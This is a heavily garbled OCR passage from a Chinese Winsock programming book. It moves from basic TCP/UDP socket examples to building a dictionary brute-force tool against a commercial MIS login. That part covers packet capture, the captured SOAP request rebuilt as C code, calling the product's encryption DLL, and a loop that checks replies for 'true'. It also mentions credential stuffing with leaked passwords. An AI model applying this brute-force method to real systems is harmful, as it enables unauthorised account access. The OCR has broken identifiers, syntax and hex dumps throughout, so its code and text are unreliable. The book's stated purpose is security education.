recv(sServer, szMsg, MAXBYTE, 0);» 
printf("Server MSG TD %s Vr\ ny soMsglr 


/7 发 送 消息 

lstrepy(szMsg, "hello Server!\r\n')? 

sendl(sServer, szMsg, strlen(szMsg) + sizeof (char), 0)， 
WSACleanup (); 


瑟 名 起 记 卫 位 0 


} 

以 上 代码 就 是 客户 端的 代码 ， 同 样 也 非常 简单 。 在 VC6 中 创建 控制 台 的 应 用 程序 ， 在 创 
建 项 目 是 选择 “Win32 Console Application”。 这 里 要 分 别 为 服务 器 端 程序 和 客户 端 程序 创建 
项 目 ， 然 后 分 别 将 服务 器 端 代码 和 客户 端 代 码 进行 编译 连接 。 代 码 都 编译 连接 完成 以 后 ， 首 
先 运行 服务 器 端 程 序 ， 再 运行 客户 端 程序 ， 这样 第 一 个 基于 TCP 的 服务 器 端 程序 和 客户 端 程 
序 就 完成 了 。 


2.2.2 基于 UDP 的 通信 


1， 服 务 器 端 代码 

基于 UDP 协议 的 服务 器 端 程序 不 会 去 监听 端口 和 等 待 客户 端的 请 求 连接 ， 因 此 UDP 的 
服务 端 程序 相对 于 TCP 的 服务 端 程序 来 说 代码 更 短 。 基 于 UDP 的 服务 端 代码 如 下 : 

#include <stdio.h> 


#include <winsoocok2.h> 
#pragma comment (lib, "ws2.32") 








int main() 
{ 
WSADATA wsaDat ai 
WwSAStartup (MAKEWORD (2, 2), &wsaData); 


// 创建 套 接 字 
SOCKET sServer = socket (PF INET, SOCK DGRAM, IPPROTO UDP); 


// 对 sockaddr_in 结构 体 填充 地 址 、 端 口 等 信息 

struct sockaddr in ServerAddr; 

ServerAddr.sin family = AF INET; 
ServerAnddr.sin addr,S Unsaddr = net addr (TiO L030 La 
ServerAddr.sin port = htons (1234); 
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// 绑 定 套 接 字 与 地 址 信息 
bind(sServer, (SOCKADDR *)&ServerAddr, sizeof (ServerAddr)); 


// 接收 消息 

char szMsg[MAXBYTE] = { 0 }; 

struct sockaddr in ClientAddr; 

int nsize = sizeof (ClientAddr); 

recvfrom(sServer, szMsg, MAXBYTE, 0, (SOCKADDR*) gClientAddr, g&nSize); 
printf ("Client Msg: SS \r\n", szMsg); 


printf ("ClientIP=%s;%d\r\n",inet ntoalClientAddr.sin addr), 
ntohs (ClientAddr.sin port)); 


/7 发 送 消息 

lstrcpy(szMsg, "Hello Client!\r\n"); 

nSize = sizeof (ClientAddr): 
sendto(sServer;szMsg, strlen (szMsg)+sizeof (char),0, (SOCKADDR*) sClientAddr, nsSize); 


WSACleanup (); 


return 0; 
} 


2. 客户 端 代码 
基于 UDP 客户 端的 代码 相对 于 TCP 的 客户 端 代 码 来 讲 ， 不 需要 调用 connect() 函 数 进行 


连接 ， 省 去 了 TCP 的 “三 次 握手 ”的 过 程 ， 可 以 直接 发 送 数 据 给 服务 器 。 基 于 UDP 的 客户 
端 代码 如 下 : 


#include < staioc .hy> 
#include <winsook2.h> 
#pragma comment (lib, "ws2_32") 


int main'() 


{ 
WSADATA wsabData; 
WSAStartup (MAKEWORD(2, 2), &wsaData),; 


// 创建 套 接 字 
SOCKET sClient = socket (PF_INET, SOCK DGRAM, IPPROTO. UDP); 


// 对 sockaddr_in 结构 体 填充 地 址 、 端 口 等 信息 

stract sockaddr in ServerAddr; 

ServerAddr.sin family = AF_INET; 
ServerAddr,sin addr.Ss un.s addr = inet addr ("10.10.30.12"); 
ServerAddr.sin Port = htons{(1234); 


// 发 送 消息 

char szMsg[MAXBYTE] = { 0 }; 

lstrcpy (szMsg, "Hello Server!\r\n"); 

int nSize = sizeof (ServerAddr); 
sendto(sClient,szMsg, strilen (szMsg)+sizeof (char),0, (SOCKADDR*) &ServerAddr, nsSize) 


// 接收 消息 

nSize = sizeof (ServerAddr); 

recvfrom(sClient, szMsg, MAXBYTE, 0, (SOCKADDR*)&ServerAddr, &nSize); 
printf ("Server Msg: %s \r\n", szMsg); 


WSACleanup (); 


return 07 


} 


在 完成 服务 端 和 客户 端 代码 后 ， 将 代码 都 进行 编译 连接 ， 然 后 先 运行 服务 器 端的 程序 ， 
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再 运行 客户 端的 程序 ， 这 时 可 以 看 到 服务 器 端 和 客户 端 能 够 正常 接收 到 对 方 发 来 的 字符 串 信 
恩 ， 说 明 通 信和 成功 。 


2.2.3 密码 暴力 猜 解 剖析 


前 面 学 习 了 关于 Winsock 编程 方面 的 基础 API 函数 ， 前 面 的 两 个 例子 把 学 习 过 的 关于 
Winsock 的 API 函数 基本 使 用 流程 进行 了 梳理 ， 完 成 了 简单 的 基于 TCP 和 UDP 的 服务 器 端 
与 客户 端 程序 通信 。 这 些 看 似 简单 的 函数 感觉 可 能 用 处 不 大 , 但 是 现在 用 这 些 简单 的 Winsock 
函数 来 完成 一 个 密码 暴力 猜 解 的 黑客 工具 来 感受 一 下 刚才 所 学 知识 的 用 处 。 

1. 软件 编写 前 的 相关 说 明 

信息 化 的 时 代 使 得 ERP 系统 、MIS 多 如 牛 毛 。 很 多 公司 都 在 使 用 OA 系统 〈 办 公 自 动 化 
系统 )， 还 有 很 多 公司 使 用 财务 、 业 务 等 相关 的 管理 信息 系统 软件 或 ERP 系统 软件 。 其 中 不 
少 大 、 中 型 的 管理 信息 系统 软件 、ERP 软件 价格 非常 昂贵 ， 但 是 安全 性 设计 却 不 是 很 好 。 

这 次 针对 获取 某 大 型 MIS 的 用 户 登 录 密 码 来 设计 开发 一 个 暴力 猜 解 工具 。 这 个 MIS 价 
格 非常 昂贵 ， 但 是 安全 性 设计 并 不 好 。 通 过 分 析 该 MIS 登录 时 网 络 传输 的 数据 来 设计 这 个 
王 其 2 


注 : 由 于 该 MIS 属于 商业 软件 ， 这 里 就 不 给 出 该 MIS 的 名 字 了 。 这 里 给 出 这 个 例子 完全 是 为 了 学 习 安全 编 
程 知识 ， 请 勿 非法 使 用 给 他 人 造成 损失 ， 如 有 问题 属 个 人 行为 ， 与 作者 及 出 版 社 无 关 。 


2， 登 录 封包 的 解析 

每 个 MIS 都 有 一 个 登录 界面 ， 输 入 用 户 名 和 对 应 的 密码 后 就 可 以 登录 了 。 如 果 用 户 名 和 
密码 都 正确 ， 就 成 功 登 录 ， 和 否则 登录 失败 。 那 么 在 登录 时 ， 系 统 做 了 些 什 么 事情 呢 ? 首先 ， 
登录 时 客户 端的 登录 界面 会 把 用 户 名 和 密码 发 送 给 服务 器 ;然后 服务 器 会 在 数据 库 中 匹配 用 
户 名 和 密码 是 否 有 效 ， 如 果 有 效 则 发 送 登录 成 功 的 消息 允许 客户 端 进 入 系统 ， 如 果 登 录 失 败 
则 发 送 消息 拒绝 客户 端 进行 登录 ; 最 后 ， 客 户 端 接收 到 服务 器 发 来 的 消息 来 完成 登录 ， 或 者 
是 提示 密码 错误 。 

确定 了 登录 的 过 程 就 可 以 开始 准备 工作 了 ， 首 先 确定 登录 时 客户 端 发 送 了 什么 样 的 数据 
给 服务 器 ， 其 次 就 是 服务 器 传 回 什么 样 的 数据 给 客户 端 。 只 要 确定 了 这 两 个 动作 的 数据 ， 就 
能 猜 解 出 一 对 有 效 的 用 户 名 和 密码 了 。 i 

如 何 获 取 客 户 端 发 出 的 数据 、 服 务 器 发 
回 的 数据 昵 ? 这 里 使 用 WPE Pro 工具 , 该 工 
具 是 通过 将 DLL 文件 注入 目标 进程 中 ， 然 后 
hook send(0、recv0、WSASend0 和 WSARecv0 
四 个 Winsock 函数 来 截取 封包 的 。 该 工具 如 
图 2-1 所 示 。 

打开 MIS 系统 停留 在 登录 界面 处 ， 然 后 下 | 
使 用 WPE 选中 MIS 系统 的 进程 ， 选 择 方法 ”祝福 
是 单 击 WPE 工具 栏 上 的 “目标 程序 ” 在 出 图 2-1 WPE Pro 工具 界面 
现 的 “选择 目标 程序 ”中 选择 MIS 系统 的 进程 ， 如 图 2-2 所 示 。 





刘 同 对 











2.2 ”Winsock 编程 实例 





打开 要 抓 包 的 进程 后 ， 就 开始 进行 抓 包 ， 单 击 工具 栏 上 的 “开始 ”按钮 等 待 抓 包 ， 如 
图 2-3 所 示 。 











Froce Fl 
轻 ctfmon. axe C: NWTINDOWS\ systen32\c. 


加 svchost. exe BF8 C:\WINDOWS\systemi2\s,.. 


ordi AlC C:\Programn Files\Goog... 
IGooglePinyi... C60 C:\Program Files\Goog... 

QQ, exe 8E4 D:\Program Files\Tenc..., 
加 六 Platform exs 78 D:\Program FilesNTernc, 
全 et. exe DC CMProgram Files\King,.. 
潮 conime, exe &5C EC; \WINDOWS\systen32\c. ., 





图 2-2 “选择 目标 程序 ” 界 f 


在 WPE 等 待 抓 包 的 时 候 ， 在 MIS 系统 上 输入 用 户 名 和 密码 ， 然 后 登录 ，WPE 就 抓 取 到 
了 很 多 相关 的 登录 数据 ， 在 MIS 系统 正式 进入 系统 时 单 击 WPE 的 “停止 ”按钮 ， 然 后 就 可 
以 看 到 很 多 的 抓 包 数 据 了 。 当 然 ， 如 果 登 录 失 败 的 话 ， 也 会 抓 取 到 很 多 数据 包 ， 当 提示 “ 登 
录 失 败 ” 时 单 击 WPE 的 “停止 ”按钮 ， 然 后 也 可 以 看 到 很 多 的 抓 包 数 据 。 这 里 给 出 登录 成 
功 后 的 抓 包 数据 ， 也 如 图 2-4 所 示 。 





图 2-3 “开始 ” 抓 包 






















0000000 5G 4F 53 S54 20 ZF 65 6E 6A 6F 79 72 6D 65 73 SF 


Bb. 5 Ee: 浊 ， 
注 q 晶 ; 
季 ;0. 孚 :3 Be 
b. 53 q 
6 FIST 

Dooonin ?7 73 2F 77 73 ZF 70 51 73 73 70 6F 72 74 2F 63 
0o000020 37 73 To 1 73 73 70 EF 72 34 66 6F 72 70 52 王 9 
oog06n050 61 73 65 76 3F 77 73 54 6C 230 28 S54 54 SO 2F 31 


lobooo0nan 2E 31 OD Ok 46 BF 33 74 3A 20 31 39 32 2E 31 36 Num 
DVD00050 38 2 30 2E 32 35 32 3A 56 30 36 31 0D Da 43 67 WN 
|oo0opoo60 6E 6E 65 63 74 69 6F BE 34 20 46 65 55 70 20 41 mm 

|oo000070 6cC 69 76 &5 OD VA 55 33 65 72 2D 41 67 55 BE 74 live,.User berg 
(D0000080 3A 20 45 61 73 79 53 6F 61 70 26 28 2F 30 28 35 : Easysoap+/0. 6 
D0000090 on Oa 43 6F BE 74 85 6E 34 2D 54 79 30 55 3 320 ,,Content-Type: 

DDOOODAQG 74 65 76 74 2F 76 6D 6C 3B 20 63 68 6 372 73 65 vext/xml; charse 
[0000080 74 3D 22 55 54 46 2D 38 22 OB ON 53 AF 41 50 1 t="UTF-8"., -50APA 
6806005D 53 7469 HF EE 到 20 22 69 74 74 70 3A RF 2F 74 Ction: "MEtp: /7T 
Doaaoop0 55 6b 76 75 72 69 2E 6F 72 .67 2F 56 .65 72 69 66 empuri,org/Verir 
00000E0 79 50 93 77 6F 78 64 22 Ob Ok 43 6F 6E 74 65 6E yhaword",, Conten 
Ibo0000F0 74 2D 4C 65 6E 67 74 59 3 20 35 39 38 OD 0A OD t-Length:; 599,.. 
jgo000100 OA 3 45 3A 45 BE 76 65 EC 6F 70 65 OD DA 09 78 <E:Tnvelope.. .x 
on00110 6D 6 6E 73 3 45 科 22 68 74 74 70 3A 2F 2F 73 mins:E="htty://s 
ri 53 68 65 5D 61 73 2E 78 6D 6C 73 6F 6 70 2E 6F chemas,xmlaoap.o hal 
4 二 








图 2-4 WPE 针对 MIS 系统 的 抓 包 截图 


在 如 此 之 多 的 数据 包 中 ， 只 要 查看 前 两 个 就 可 以 了 。 第 1 个 数据 包 是 登录 信息 ， 包 含 用 
户 名 和 密码 (第 1 行 数据 包 是 发 送 包 , 在 抓 包 信息 的 最 后 一 列 可 以 看 出 ), 第 2 个 数据 包 是 返 
回 是 否 登 录 成 功 的 信息 (第 2 行 数据 包 是 接受 包 , 在 抓 包 信息 的 最 后 一 列 可 以 看 出 )。 只 要 分 
析 前 两 个 数据 包 就 可 以 完成 “密码 暴力 猜 解 ”的 工具 了 。 下 面 来 看 一 下 第 一 个 数据 包 和 第 二 
个 数据 包 的 内 容 ， 如 图 2-5 和 图 2-6 所 示 。 

图 2-5 中 标 出 了 整个 数据 包 中 关键 的 内 容 和 需要 修改 的 内 容 ， 下 面 来 说 说 这 几 部 分 的 内 容 。 

在 图 2-5 中 , 选中 的 第 一 部 分 是 “Content-Length:601”， 这 里 的 601 指定 了 该 数据 包 的 长 
度 。 由 于 用 户 名 和 密码 的 长 度 是 可 改变 的 ， 因 此 这 里 的 值 是 计算 出 来 的 。 那 么 这 个 值 应 该 如 
何 计 算 呢 ? 其 实 很 简单 ， 用 当前 包 的 长 度 减 去 用 户 名 的 长 度 和 密码 的 长 度 ， 就 得 到 该 数据 
包 的 一 个 基数 。 当 前 数据 包 的 长 度 为 601， 用 户 名 “010683” 的 长 度 为 6， 加 密 后 的 密码 
“C6YOvp+W5ok=” 的 长 度 为 12， 那 么 601-6-12 = 583。 
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| 


onnection: Keep-Alive 
ser-fAgent: EasySoap++/8.6 
: text/xml; charset="JTF-8"" 


S 3 "htto:/7tempuri.org/VerifyPsword” 尖 
ontent-Length ~ 包 长 度 ， 需 修正 





E:Envelope 
xmlns:E="http://schemas.xmlsoap .org/soap/envelope/”" 
xmlns:A="http://schemas.xmlsoap .org/soap/encoding/" 
xmlns:s="http://www.w3.0rg/280817XMLSchema-instance”"" 
xmlns:y="http:A/www.wu3.0rg/20817/XHLSchema” 
E:encodingSstyle="http://schemas.xmlsoap.org/soap/encoding/"> 


:Body> 

:UerifyPsword 
xmlns:m="http:7/tempuri.org/"> 

:SName 用 户 名 
s:type="y:string’ 16968370 :SsName> 

i:sType = 
s:type-"y:string" Type 天 法 显示 的 字 

:5S0rgId 需 修正 
s:type="y:string”"></m:s0rgld> 

:SsPassword 


s:type="y:string"JC6v0uP*Wsok7mspasswordy” 川 密 后 的 密码 


/mn:VeriftyPsword> 





图 2-5 登录 发 包 内 容 


ache-Control: private, max-age=8 

ontent-Type: text/xml; charset=utf-—8 

Seruer: Hicrosoft-IISZ7 -8 

N-AspNet-Uersion: 2.8.58727 

KR-Powered-By: ASP.NET..Date: Fri, 21 0ct 2611 63:863:54 GHMT 
ontent-Length: 364 


?xml version="1.0" encoding="utf-8"?><soap:Envelope 登录 成 功 状态 

xmlns:soap="http://schemas .xmlsoap .org/soap/envelope/” ymins:xsi="http://Wwww.w3.0rg/2661/XMLSchema— 
instance” xmlns:xsd="http://www.w3.0rg/2861/XHLSche <soap:Body><UVerifyPswordResponse 
xmlns="http://tempuri.org/"><UVerifyPswordResult [truec} /verifyPswordResult></UerifyPswordResponse></soah 
:Body> /so0ap :Envelope> 





图 2-6 登录 收 包 内 容 


在 图 2-5 中 ， 选 中 的 第 二 部 分 是 MIS 系统 的 用 户 名 ， 每 次 把 要 猜 解 密码 的 用 户 名 替换 到 
这 里 就 可 以 。 图 2-5 中 ， 选 中 的 第 3 部 分 是 一 些 无 法 表示 出 来 的 字符 〈 其 实 并 不 是 这 些 字 符 
无 法 显示 , 而 是 抓 包工 具 无 法 处 理 某 些 字符 编码 方式 导致 ), 将 这 部 分 直接 使 用 十 六 进 制定 义 
出 来 ， 然 后 添加 到 数据 包 中 。 图 2-5 中 ， 选 中 的 第 四 部 分 是 登录 时 的 密码 ， 这 部 分 算是 猜 解 
密码 的 关键 。 测 试 的 密码 ， 需 要 使 用 “字典 ”工具 生成 一 个 密码 字典 (就 是 一 个 包含 各 种 字 
符 串 的 文本 文件 )， 然 后 不 断 蔡 换 密码 ， 发 送 登录 数据 包 ， 判 断 接收 到 的 返回 包 ， 看 其 是 和 否 有 
登录 成 功 的 状态 ， 如 果 有 就 在 屏幕 上 显示 出 能 够 登录 成 功 的 密码 ， 如 果 没 有 则 继续 蔡 换 密码 
再 次 发 送 登录 数据 包 。 登 录 密 码 是 加 密 后 的 密码 ， 需 要 知道 加 密 算法 和 加 密 密 铀 。 该 MIS 系 
统 是 直接 调用 第 三 方 的 加 密 库 函数 ， 而 加 密 的 密 钥 需 要 自己 去 找 。 为 了 保证 知识 的 连贯 性 ， 
关于 如 何 找到 密码 的 加 密 密 钥 ， 这 里 不 做 介绍 。 

TP RE OR 
密码 是 否 成 功 的 重要 标志 ， 判 断 该 值 的 方法 比较 简单 ， 就 不 做 过 多 说 明 ， 具 体 在 代码 中 会 有 体现 。 

关于 登录 发 送 的 数据 包 和 登录 返回 的 状态 数据 他 都 忆 经 了 解 党 了 了 ， 将 这 卫 部 苍 害 炙 为 'C 

















二 
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char n EE HTTPAZ1.TArAO” \ 
"Host: \r\n” \ 


"Connection: Keep-Alive\r\n”" \ 

"User-Agent: EasySoap++/08.6\r\n” \ 

"Content-Type: text/xnl; charset=\"UTF-8M\M"\r\n \ 

"SOnPhRction: \"http://tempuri.org/VerifyPsword\\r\An" \ 
"Content-Length: 登录 数据 包 的 长 度 

”APNRNPNR”\ 

"<E:Envelope\r\n” \ 

* xmlns:E=\"http://schemas.xmlsoap.org/soap/envelope/\\r\n” \ 

" xmlns:A=\"http://schemas.xmlsoap .org/soap/encoding/\"\r\n” \ 

" xmlins:5=\"http:/ /Wwwy.w3.0rg/2881/XMLSchema-instanceM"\r\n" \ 

” xmlns:y=\ "http://Awwwy.w3.0rg/2681/XMLSchena\"\r\n™” \ 

"* E:encodingStyle=\"http://schemas .xmlsoap.org/soap/encoding/\">\r\n" \ 
"<E:Body>\r\n” \ 

"<m:VerifyPsword\r\n" \ 

™” xnlns:m=\"http://tempuri.org/\M?\r\n” \ 

"<m:sName\r\n” \ = 站 可 上 

" s:type=\"y :string\" 交 引 /TsNaneSVr Nn™ NA 登录 的 用 户 名 

"<n:sType\r\n™” \ Et hs ‘ a mt - 
" s:type=\"y:stringy "六 中/n:sTypey\r\n™" \ 无 法 显示 的 字符 ， 这 里 需要 修 正 
"<m:s0rgId\r\n” \ 使 用 下 面 的 szShellCode 进 行 修正 
" sstype=V"y:string\"></m:sOrglId>\r\n" \ 

"<m:sPassword\r\n” \ Ee = 

“ s:type=\"y:string\" 交 下 /mn:sPassword>\r\n™ \ 加 密 后 的 登录 密码 
"</m:UVerifyPsword>\r\n” \ 


"</E:Body2\r\n™” \ 
"</E:Envelope>\r\n”; 


/7 无 法 显示 字符 的 定义 
char szShellDode[] = "\NxXE6NX8DNXB7N\xESNxhFN\xX9RNXE9Nx9BNxB6NxE5Nx98HNxnhENXENNXxBSNx98NxE7N\xB3”\ 
"\xBB\xE7\xBB\x9F"; 


图 2-7 封包 的 Ci 语言 形式 定义 





3. 字典 文件 的 生成 

小 时 候 有 种 游戏 是 “ 猜 数 游戏 ” 一 个 人 心里 想 1 一 10 的 一 个 数 ， 另 一 个 人 猜 这 个 数字 ， 
如 果 猜 对 了 就 会 告诉 他 猜 对 了 ， 如 果 猜 错 了 会 告诉 他 猜 错 了 ， 猜 的 人 需要 继续 猜 。 猜 解 别人 
账号 的 密码 也 是 类 似 ， 但 是 自己 猜 解 密码 要 有 一 个 范围 ， 比 如 说 密码 的 长 度 等 范围 。 

这 里 出 于 演示 ， 为 了 让 猜 解 的 速度 尽 可 能 快 ， 选 择 的 猜 解 的 密码 长 度 为 6 位 ， 密 码 的 组 
合 为 纯 数字 。6 位 的 纯 数 字 的 组 合 排列 个 数 为 1 000 000 个 。 使 用 “字典 生成 工具 ”来 生成 一 
个 字典 文件 ， 这 里 使 用 的 字典 生成 工具 的 名 字 是 “ 易 优 软件 一 超级 字典 生成 器 V3.2”， 该 软件 
的 界面 如 图 2-8 所 示 。 将 数字 部 分 全 部 选中 ， 如 图 2-8 所 示 。 然 后 选择 “生成 字典 ”选项 卡 ， 
选中 密码 位 数 为 6 位 ， 选 择 字 典 文 件 的 路 径 ， 单 击 “ 生 成 字典 ”按钮 将 生成 字典 ， 如 图 2-9 所 
示 。 这 样 就 生成 了 一 个 大 小 为 7.62 MB 的 字典 文件 。 


II3EEREEEEEIEECRESIESER 国史 中 = EI 
于。 类 村 从 | 目 才 六 | 生日 | 生字 商 | a 类 | 注油 | 下 EE | 
WF PIVepvIptvs rer pa sell 
FCerCo er 


| 二 司 由 时 了 大 本 展 放 出- 瑟 属 -引导 
Cw pe 











Pare erar a re erary 

ea 中 
me | 
ly ee 
Te yt ie! 人 et 
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图 2-8 字典 生成 工具 图 2-9 字典 生成 
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4. 加 密 库 的 使 用 

在 MIS 系统 中 ， 有 一 个 des64.dll 文件 ， 对 密码 进行 加 密 的 加 密 算法 就 在 该 DLL 文件 中 。 
该 DLL 文件 有 一 个 导出 函数 名 为 b64_des()， 只 要 在 程序 中 调用 该 函数 对 密码 进行 加 密 后 ， 
就 可 以 将 加 密 后 的 密码 填充 到 登录 的 数据 包 中 进行 发 送 了 。 

如 何 使 用 这 个 函数 呢 ? 如 何 使 用 DLL 文件 呢 ? 通常 有 两 种 情况 可 以 来 使 用 这 个 DLL 文 
件 ， 一 种 方式 是 隐 式 调用 ， 另 一 种 方法 是 显 式 调用 。 使 用 隐 式 调用 一 般 除 了 DLL 文件 以 外 ， 
还 需要 有 函数 导出 信息 库 .lib 文件 和 一 个 函数 定义 的 头 文件 。 当然, 这 里 并 没有 提供 Lib 文件 
和 头 文件 ， 只 能 使 用 显 式 调用 的 方法 。Windows 系统 提供 了 两 个 API 函数 ， 方 便 用 户 显 式 调 
用 DLL 文件 里 的 函数 ， 这 两 个 函数 分 别 为 LoadLibrary() 和 GetProcAddress()。 下 面 来 介绍 这 
两 个 函数 的 使 用 。 

LoadLibrary() 函 数 的 定义 如 下 : 


HMODULE LoadLibrary (LPCTSTR lpFileName); 

该 函数 的 作用 是 加 载 一 个 DLL 文件 到 进程 的 地 址 空间 中 ， 该 函数 的 参数 lpFileName 指 
定 一 个 DLL 文件 的 路 径 。 函 数 的 返回 值 是 返回 一 个 模块 句柄 ， 以 便 通 过 模块 句柄 对 DLL 文 
件 进 行 操作 。 

GetProcAddressO) 函 数 的 定义 如 下 : 


FARPROC GetProcAddress (HMODULE hModule, LPCSTR lpProcName); 

该 函数 的 作用 是 获取 指定 模块 中 的 导出 函数 的 地 址 。 该 函数 有 两 个 参数 ， 第 一 个 参数 
hModule 指定 获取 函数 所 在 模块 的 句柄 ， 第 二 个 参数 jpProcName 指定 导出 函数 的 函数 名 。 该 
函数 返回 成 功 将 得 到 一 个 模块 中 导出 函数 的 地 址 ， 通 过 该 地 址 就 可 以 使 用 该 函数 。 关 于 DLL 
文件 的 编写 及 调用 ， 在 后 面 的 章节 中 仍然 会 提 到 。 

5. 猜 解 程序 的 实现 

前 面 对 密 码 猜 解 已 经 有 了 详细 的 介绍 ， 猜 解 程序 的 准备 工作 都 已 经 做 好 了 ， 猜 解 程序 的 
基础 知识 也 都 掌握 了 。 现 在 ， 新 建 一 个 支持 MFC 的 Console Appcation 的 应 用 程序 ， 然 后 进 
行 最 后 的 编码 工作 : 


ial emarn(dnt arge, WOHAR* argv li] eHaAR* "envBtl) 
int nRetCode = 07 


// socket 的 建立 及 与 服务 器 的 连接 
WSAData WwWsaDataz 
WSAStartup (MAKEWORD (2, 2), &wsaData); 


SOCKET 5 = Socket (PF._ INET, SOCK ‘STREAM, TPPROTO_ TCP); 


sockaddr jin sockAddr; 

sockAddr .sin addr.Ss un.Ss addr = inet addr ("192.168.0.252"); 
sockAddr.sin port = htons(8001); 

sockAddr .sin family = PF INET; 


int b= connect(s, (SOCKADDR *)&sockAddr, sizeof (sockAddr)); 


// 加 载 aes64.911 文件 

char szCurrentPath[MAX PATH] = { 0 }; 
HINSTANCE hMod = NULL; 

PROC des64Proc = NULL; 
GetCurrentDixrectory (MAX PATH, szCurrentPath); 


strcat (szCurrentPath, "\\des64.d11"); 








2 Winsock 编程 实例 
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strRecv = szRecvBuffer; 
// 查找 反馈 包 中 是 否 有 “true” 


int bRet = strRecv.Find("true”, 0); 


/7 bRet 不 为 -1， 则 说 明 登 录 成 功 
// 登录 成 功 ， 调 用 cout 输出 密码 
if ( brRet 1= -1 ) 
{ 
cout << endl; 
cout << "该 工 号 对 应 密码 为 ; " << szPwd << endl; 
break; 
$ 
} 
DWORD dwEnd = GetTickCount(); 


DWORD dwTimed = dwEnd 一 dwStart» 
printf(" 所 需 时 间 为 : %d.%dG 秒 Mr\n",， dwTrimed / 1000, dwTrimed % 1000); 


if ( phile Li= NOID ) 
{ 
fclose (pFile); 
pFile = NULL; 
} 


closesocket (s); 
WSsACleanup (); 


getchar (); 
getchar (); 


return nRetCode? 

} 

代码 中 有 2 个 陌生 的 函数 ， 分 别 是 GetCurrentDirectory() 和 GetTickCount()， 第 1 个 函数 
是 获取 当前 目录 ， 第 2 个 函数 用 来 获取 从 开机 启动 到 现在 经 过 的 毫秒 数 。 

获得 当前 目录 的 函数 定义 如 下 : 

DWORD GetCurrentDirectory(DWORD nBufferLength, LPTSTR lpBuffer);? 

获取 从 开机 启动 到 现在 经 过 的 毫秒 数 的 函数 定义 如 下 : 

DWORD GetTickCount (VOTD); 

在 整个 代码 中 有 一 部 分 能 入 了 汇编 代码 , 在 C 或 C++ 的 代码 中 使 用 了 汇编 代码 ， 通 常 称 
之 为 “内 联 汇 编 "。 内 联 汇 编 代码 如 下 : 


asm 


{ 
push 1 
push nPpassLen // 加 密 前 字符 串 长 度 
Bush szKey // 密 钥 
push pszBufPpass /7 保存 加 密 后 的 字符 串 
push pszPassnew // 原 密码 字符 串 
Call des64Proc 

} 


这 里 的 代码 是 直接 通过 调试 获得 的 ， 这 样 写 比较 简便 ， 不 需要 进行 额外 的 函数 声明 ， 该 
写法 属于 个 人 的 习惯 。 调 用 该 des64.dll 文件 中 的 b64 _des() 函 数 时 ， 笔 者 并 没有 该 函数 的 使 用 
方法 ， 因 此 该 函数 的 使 用 方法 需要 进行 动态 调试 那 套 商业 系统 登录 时 对 该 函数 的 调用 方式 ， 
这 就 涉及 了 道 向 相关 的 知识 。 该 部 分 知识 在 后 面 进行 介绍 。 

将 字典 文件 和 des64.dll 文件 放置 在 与 本 书 程序 相同 的 目录 下 运行 程序 ， 运行 后 的 破解 结 
果 如 图 2-10 和 图 2-11 所 示 。 





中 





2.3 非 阻 塞 模式 开发 





图 2-10 破解 演 人 “结果 一 六 





图 2-11 破解 演示 结果 ( 


这 种 暴力 破解 是 很 花费 时 间 的 ， 而 且 在 某 种 程度 上 通过 A 理 和 科学 ， 
因为 字典 生 i 4 是 一 些 序列 的 组 合 〈 比 如 字母 、 数字 等 组 合 )， 并 不 代表 真正 的 密码 ， 
这 样 会 做 很 多 没有 意义 的 工作 ， 导 致 效率 更 加 低下 。 在 2011 年 年 底 CSDN 的 账号 和 密码 在 
网 上 被 “ 曝 ” Dy 哇 续 有 各 大 网 站 的 数据 库 被 “上 曝 ”。 被 “ 曝 ” 的 这 部 分 密码 就 非常 有 价值 。 
在 进行 密码 暴力 破解 时 ， 它 们 是 真正 被 人 使 用 的 密码 ， 而 非 是 字典 生 成 的 字符 串 组 合 ， 这 些 
密码 更 科学 ， 在 进行 暴力 破解 时 会 更 有 效 。 在 各 种 数据 库 被 “上 曝 ” 之 后 ， 用 现 有 的 密码 去 其 
他 的 系统 进行 “ 撞 库 ” Ce - 定 的 几率 获得 系统 的 账号 和 密码 。 因 此 ， 在 设置 密码 上 ， 除 
了 密码 的 复杂 性 以 外 ， 将 不 同 的 账号 设 定 为 不 同 的 密码 ， 如 果 有 一天 某 个 账号 的 密 码 不 愤 被 
“上 曝 ”， 自己 也 可 以 清楚 的 指导 是 哪个 账号 的 密码 出 现 了 问题 。 


2.3” 非 阻塞 模式 开发 


Winsock 套 接 字 的 工作 模式 有 两 种 ， 分 别 是 阻塞 模式 〈 同 步 模式 ) 和 非 阻 塞 模式 (异步 
模式 )。 阻 塞 模式 下 的 Winsock 函数 会 将 程序 的 某 个 线程 《如 果 程 序 中 只 有 一 个 主线 程 ， 那 
么 会 导致 整个 程序 处 于 “等 待 ” 状态) 处 于 “等 待 ”状态 ， 比 如 上 面 的 程序 中 ， 在 调用 recv( 
函数 后 ， 该 函数 在 接收 到 数据 前 会 一 直 处 于 等 待 状态 ， DT -暂停 中 。 
阻塞 模式 的 Winsock 函数 不 会 发 生 需 要 等 待 的 情况 。 在 异步 模式 下 ， 当 一 个 函数 执行 后 会 立 
刻 返 回 ， 即 使 是 操作 没有 完成 也 会 返回 ， 当 函数 执行 完成 时 ， 会 以 某 包 方式 通知 应 用 程序 。 
显然 ， 异 步 模式 更 适合 于 Windows 下 的 开发 。 

在 本 节 前 面 介绍 的 内 容 中 ，Winsock 都 属于 阻塞 模式 。 本 节 重 点 介绍 异步 模式 的 Winsock 
编程 。 

2.3.1 设置 Winsock 的 工作 模式 

个 套 接 字 通 过 socket() 函 数 创建 后 , 默认 工作 在 阻塞 模式 下 。 为 了 使 得 套 接 字 工 作 在 
i `、， 就 需要 对 套 接 字 进行 设置 ， 将 其 改编 为 非 阻塞 模式 。 改 变 套 接 字 工 作 模 
式 的 方法 有 多 种 ， 为 了 基于 Windows 应 用 程序 的 消息 驱动 机 制 ， 这 里 只 介绍 常用 的 改变 套 接 
字 的 函数 。 该 函数 是 WSAAsyncSelect() 函 数 ， 其 定义 如 下 : 
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int WSAAsyncSelect( 
SOOKET 3, 
HWND hwndgd, | 
unsigned int wMsg, 
; lEvent 
WSAAsyncSelect() 函 数 会 把 套 接 字 设置 为 非 阻 塞 模 式 ， 该 函数 会 绑 定 指定 套 接 字 到 一 个 
窗口 。 当 该 套 接 字 有 网 络 事件 发 生 时 ， 会 向 绑 定 窗口 发 送 相应 的 消息 。 该 函数 的 参数 含义 说 
明 如 下 。 

S: 指定 要 改变 工作 模式 为 非 阻塞 模式 的 套 接 字 。 

hWnd: 指定 当 发 生 网 络 事件 时 接收 消息 的 窗口 。 

